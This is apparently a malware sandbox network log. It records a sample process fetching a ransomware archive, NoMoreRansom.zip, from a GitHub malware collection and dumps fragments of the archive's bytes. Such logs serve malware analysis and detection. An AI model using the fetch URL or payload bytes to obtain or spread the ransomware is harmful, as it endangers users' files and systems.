                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:32 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:42 UTC1361INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                34192.168.2.349710185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:42 UTC1362OUTGET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                35185.199.108.133443192.168.2.349710C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:42 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 938498
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:42 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6953-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455723.790321,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: a8480b4319be462f7c2470a77ea33b956599ad2a
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:42 GMT
                                                                                                                                                Source-Age: 228
                                                                                                                                                2022-09-29 12:48:42 UTC1363INData Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03
                                                                                                                                                Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
                                                                                                                                                2022-09-29 12:48:42 UTC1364INData Raw: 8f 51 ef 9a 13 32 e0 6a a5 1c 6b 8d 46 dd 80 f7 0c e0 e9 06 3b cf b7 80 a4 34 00 f1 dd ce dd 89 6e 16 17 14 27 c1 30 7f 09 bb 51 a7 68 10 82 fe d7 fa 10 d7 6b 77 5b 29 43 95 99 55 67 17 40 c8 01 3f 1f af fd a3 06 32 78 b4 d9 6e 50 8a 94 c5 0b 1b 29 d4 e9 03 c6 25 75 0a 65 61 97 53 a3 e6 25 7f c9 41 49 8b f5 b4 52 ca 0e 29 28 09 b6 54 ce a0 07 26 20 4d 23 76 df 0f 91 b9 dd 85 a7 17 cc 9c 09 83 cd 3b cc 7f 75 86 42 7f 7c ae 89 e9 11 fe 37 49 60 9a 92 b3 e9 0a 85 c2 84 66 96 43 a0 08 e9 12 f1 86 29 d1 fd 6d 11 b2 72 9c 2c e1 7f 6c 2e 5d 33 f3 da 43 5a 42 44 78 67 70 a0 0c 88 27 21 85 23 32 c0 80 e8 60 89 cb e5 f9 0f 3a ef d7 cf c3 fe 77 54 63 2b 65 20 2c 6a f1 d5 6b 00 2b 21 1c 35 9c 2f ba 21 21 c4 b8 e5 2e 17 2f 63 72 e8 f1 e4 22 80 e9 03 f5 df 52 88 7c bf
                                                                                                                                                Data Ascii: Q2jkF;4n'0Qhkw[)CUg@?2xnP)%ueaS%AIR)(T& M#v;uB|7I`fC)mr,l.]3CZBDxgp'!#2`:wTc+e ,jk+!5/!!./cr"R|
                                                                                                                                                2022-09-29 12:48:42 UTC1366INData Raw: c9 bb 93 d4 21 ae db b3 7e f7 5d 47 1d 3b 97 c6 0c 89 72 5a 63 6f a4 f9 4a 0a 94 ef 4d 42 e8 5e 8e 00 62 2b 24 56 5f d6 79 ab 67 88 e8 da 2e 3b ca a5 49 ab c0 03 71 fd ef a2 3c c0 89 6b ba a7 75 69 60 86 e7 f2 75 60 d5 10 06 08 59 3e c8 98 76 f8 16 2b 63 32 36 e5 f8 a2 bd ad 58 26 0b 65 7d 72 07 a1 f3 cc e2 19 d8 1e 54 2e 04 34 9a ce 8b d9 ed 8f eb e7 f5 9d ef 34 87 81 3c 62 3d 4b e2 80 e7 c2 e4 13 fa bf 55 9c b9 2b df 54 c4 62 4d 80 3c 7a c7 7e ff d9 4c 54 8d df f4 12 1b ad ef 59 f6 52 09 e4 7f c1 17 57 82 07 2f 7b 30 82 e7 77 37 a0 2e 76 65 2c 9c f2 c4 f3 5a fd 0d 7d 42 bb 26 d7 c8 c9 2e 1f 03 4a 42 ba bf 24 d1 85 13 64 01 46 d0 04 24 ab 34 cd ae 7b 01 90 85 45 e9 07 65 96 ef 2a c6 5d 42 5a bc cd 5a 8d 1b 84 c2 03 d4 79 37 9f 3a 91 ec 39 7a 64 42 6a 97
                                                                                                                                                Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
                                                                                                                                                2022-09-29 12:48:42 UTC1367INData Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57
                                                                                                                                                Data Ascii: h"DxIE`5U$O|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
                                                                                                                                                2022-09-29 12:48:42 UTC1369INData Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5
                                                                                                                                                Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3|
                                                                                                                                                2022-09-29 12:48:42 UTC1370INData Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9
                                                                                                                                                Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku*&*sG)^@R.O$bXV$zjkN~Mctn?T ? 8t||\HDmj*P3l@>G[ jmZF{`\G&A7Ir
                                                                                                                                                2022-09-29 12:48:42 UTC1371INData Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8
                                                                                                                                                Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO|bJcx@rv7XzDXwn>-J,m^bNA|d+o}}+E8Eb
                                                                                                                                                2022-09-29 12:48:42 UTC1373INData Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42
                                                                                                                                                Data Ascii: gTIe==49;:& k&@O*.uRsBtM;0mJ`2z`6G*QXR}oddu|.hCY|~HI+D9@-FO$vW"H|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]|zr{eB
                                                                                                                                                2022-09-29 12:48:42 UTC1374INData Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5
                                                                                                                                                Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
                                                                                                                                                2022-09-29 12:48:42 UTC1375INData Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9
                                                                                                                                                Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
                                                                                                                                                2022-09-29 12:48:42 UTC1377INData Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c
                                                                                                                                                Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
                                                                                                                                                2022-09-29 12:48:42 UTC1378INData Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a
                                                                                                                                                Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG*;T*dU1L/F^Vp
                                                                                                                                                2022-09-29 12:48:42 UTC1378INData Raw: 26 e7 c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2 9b
                                                                                                                                                Data Ascii: &2\22Y1*tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]S*FHzhk;!XUIP#khCOwu/P
                                                                                                                                                2022-09-29 12:48:42 UTC1394INData Raw: c3 69 ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1 b4
                                                                                                                                                Data Ascii: i~.qrRSOiIaHCkL@^*? vWO*'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
                                                                                                                                                2022-09-29 12:48:42 UTC1410INData Raw: a7 eb 23 14 6c 04 46 33 b3 26 f4 19 7f 96 03 c0 17 b3 eb 99 3c 2d 70 92 d9 8c 66 ea 47 1b 34 34 ec 00 b5 9e 98 e6 e7 a5 34 14 de a4 c9 0f a0 ed 92 04 10 77 06 7b 13 2e ed f4 d6 0f e7 f5 f8 bb ab e5 0b 7f 6a 35 95 c6 0c 83 46 8d 38 d9 ea 73 63 31 31 85 b6 0b 43 ca 34 4a 3b 13 3b 54 4a 9c d7 32 5f ee 8f 35 74 7d 14 b0 28 b6 49 5b 84 ca 9a e1 ca 2b ea 05 03 7c 26 3f 6e 31 8e 9f d8 4b 69 68 e3 30 ad e7 c5 fd c1 85 15 d0 35 82 11 95 17 b6 78 3a 97 50 c6 72 73 11 7c e6 61 aa 1d 9a 8d 58 05 46 35 e0 69 60 41 21 5d e2 cc f3 15 b2 4e 87 6f 65 13 90 3e 6e c6 73 36 84 0c d3 3e 1c c2 79 24 96 b1 14 c9 50 20 97 3c d1 3d fb 96 fe da cf 8d 39 e8 5c 04 79 ac 97 fc 0f 2c 0d a0 d2 d2 93 c3 c5 e2 fe 92 d2 54 2d fe 31 4d d7 35 4a 6e d1 17 d4 ca 34 8b f5 51 b4 be 66 7a c6 e5
                                                                                                                                                Data Ascii: #lF3&<-pfG444w{.j5F8sc11C4J;;TJ2_5t}(I[+|&?n1Kih05x:Prs|aXF5i`A!]Noe>ns6>y$P <=9\y,T-1M5Jn4Qfz
                                                                                                                                                2022-09-29 12:48:42 UTC1426INData Raw: 49 df 64 a2 fe 37 9f 15 cb 44 dd f4 9d 67 88 6c c8 d2 c4 c1 17 43 93 ed 1f 16 77 3f dd 94 22 0e 56 18 fa 21 c8 dd ee 56 97 a7 92 d0 6d 43 4c 28 06 23 af 29 a8 51 36 ff 92 0f fe fd 3a 0a 3d f8 b8 3d b8 63 33 06 7e aa 85 6f 0b c3 5b 69 71 0f 28 78 f7 3d 28 c7 94 2a 63 81 59 4b 99 31 9d 3e 9e ef 56 0b 10 71 c4 b0 96 f3 36 97 a5 c5 4a 75 22 e4 da b3 14 c3 fc 90 cd 96 6b 09 b1 ec 42 da a4 0d d8 91 33 93 55 59 60 4d 82 06 6e 51 00 f0 f4 b5 6f 2f 2f a5 52 84 d7 76 7a d4 60 07 1d 6b 3a 0b 9a f1 53 5f 5e 15 ee 9e 60 bd ec 21 3e c7 ed b6 c8 5b 40 a9 4f 97 47 94 66 4b 57 1c a6 96 b3 41 2e d3 f3 b8 48 77 4c 46 a2 39 af 81 85 db 58 d2 89 52 9d b3 a5 3e f7 6a df ed 72 8e 75 99 14 2e 7b 09 df cc d6 17 75 97 63 88 50 27 37 b1 c1 f3 20 6d e6 bb e4 b0 5d b1 4f 0f c8 94 13
                                                                                                                                                Data Ascii: Id7DglCw?"V!VmCL(#)Q6:==c3~o[iq(x=(*cYK1>Vq6Ju"kB3UY`MnQo//Rvz`k:S_^`!>[@OGfKWA.HwLF9XR>jru.{ucP'7 m]O
